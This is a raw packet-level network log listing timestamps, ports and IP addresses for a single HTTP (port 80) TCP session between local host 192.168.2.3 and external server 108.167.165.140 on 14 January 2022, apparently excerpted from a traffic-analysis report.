Jan 14, 2022 13:49:21.801074028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801081896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801091909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801109076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801130056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801146984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801162958 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801167011 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801181078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801198959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801207066 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801217079 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801233053 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801234007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801249981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801268101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801280975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801285982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801294088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801326036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801327944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801356077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801356077 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801383972 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801387072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801403999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801409960 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801419973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801429987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801438093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801455975 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801456928 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801472902 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801491022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801501036 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801506996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801525116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801537037 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.801541090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.801599026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.946350098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946377993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946394920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946415901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946433067 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946448088 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.946449995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946466923 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946482897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946500063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946508884 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.946517944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946532965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946551085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946567059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946573973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.946583986 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946597099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.946604967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946621895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.946636915 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.946671009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947710991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947730064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947745085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947763920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947778940 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947782040 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947798967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947815895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947833061 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947833061 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947849989 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947865963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947869062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947882891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947900057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947910070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947916031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947933912 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947937012 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947949886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947963953 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947967052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947983980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.947993040 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.947999954 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.948015928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.948026896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.948031902 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.948048115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.948056936 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.948065042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.948080063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:21.948080063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.948105097 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:21.948137045 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.204152107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357382059 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357409000 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357425928 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357443094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357460022 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357465982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357476950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357495070 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357511997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357518911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357528925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357544899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357563972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357582092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357583046 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357598066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357606888 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357614994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357631922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357639074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357650042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357664108 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357666016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357681990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357685089 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357698917 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357716084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357729912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357731104 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357748985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357764959 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357767105 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357784033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357791901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357800961 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357817888 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357826948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357835054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357867002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357877016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357886076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357894897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357912064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357920885 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357928991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357945919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357949972 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357964039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357980967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.357985973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.357997894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358009100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358016014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358032942 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358047962 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358048916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358067036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358083963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358083963 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358100891 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358109951 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358118057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358134985 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358143091 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358151913 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358170033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358184099 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358187914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358205080 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358207941 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358222008 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358232021 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358241081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358258963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358274937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358275890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358294010 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358311892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358313084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358324051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358342886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358345032 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358361006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358371019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358378887 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358397007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358406067 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358412981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358428955 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358443975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358447075 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358464956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358473063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358481884 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358500004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358515024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358516932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358535051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358541012 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358551979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358565092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358568907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358586073 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358603001 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358604908 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358620882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358627081 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358637094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358655930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358666897 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358673096 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358690023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358701944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358706951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358722925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358730078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358741045 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358756065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358758926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358776093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358778000 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358793020 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358809948 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358813047 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358827114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358844042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358851910 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358860016 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358877897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358895063 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358900070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358906031 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358911991 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358928919 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358941078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358946085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358963013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358966112 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.358979940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.358997107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359004021 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359014034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359030962 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359036922 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359045982 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359054089 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359062910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359080076 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359087944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359097004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359113932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359131098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359131098 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359143019 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359148026 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359165907 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359174967 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359181881 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359199047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359201908 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359215021 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359230995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359235048 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359249115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359261036 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359266043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359283924 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359294891 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359301090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359318018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359330893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359335899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359353065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359354973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359369993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359386921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359390974 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359404087 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359421968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.359425068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359447002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.359479904 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504628897 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504653931 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504668951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504686117 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504697084 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504703999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504719973 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504729986 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504738092 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504755974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504769087 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504770994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504789114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504791975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504806995 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504825115 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504827976 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504842043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504858971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504867077 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504875898 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504890919 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504893064 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504909992 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504914045 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504925966 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504944086 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504949093 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504961967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504978895 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.504986048 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.504995108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505007029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505012035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505031109 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505042076 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505048990 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505067110 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505079985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505084038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505100965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505103111 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505117893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505121946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505134106 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505152941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505158901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505170107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505187988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505197048 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505206108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505223036 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505224943 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505240917 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505259037 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505271912 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505275965 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505294085 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:22.505306005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:22.505311012 CET	80	49743	108.167.165.140	192.168.2.3
